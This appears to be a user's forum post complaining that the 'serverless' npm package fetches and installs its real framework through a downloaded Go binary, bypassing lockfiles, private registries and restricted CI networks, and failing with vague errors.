As far as I understand, the “serverless” package on npm doesn’t contain the framework itself, rather it’s just a script that downloads a golang binary that, in turn, fetches https://install.serverless.com/versions.json to figure out the latest serverless version, then downloads it from https://install.serverless.com/archives/serverless-.tgz, and finally installs it to ~/.serverless
I see a few big downsides with this:
- It doesn’t respect package-lock.json
- It circumvents my private registry
- If
install.serverless.comis down or inaccessible (e.g. I’d like my CI to have a restrictive network access, for security reasons), then serverless doesn’t work anymore
My question is, why? From my perspective, it’s circumventing a bunch of security measures, what’s the upside?
Not only that, the aforementioned golang binary tends to fail with vague errors when a new version of servereless is released:
- exit status 1
- Error: runtime error: invalid memory address or nil pointer dereference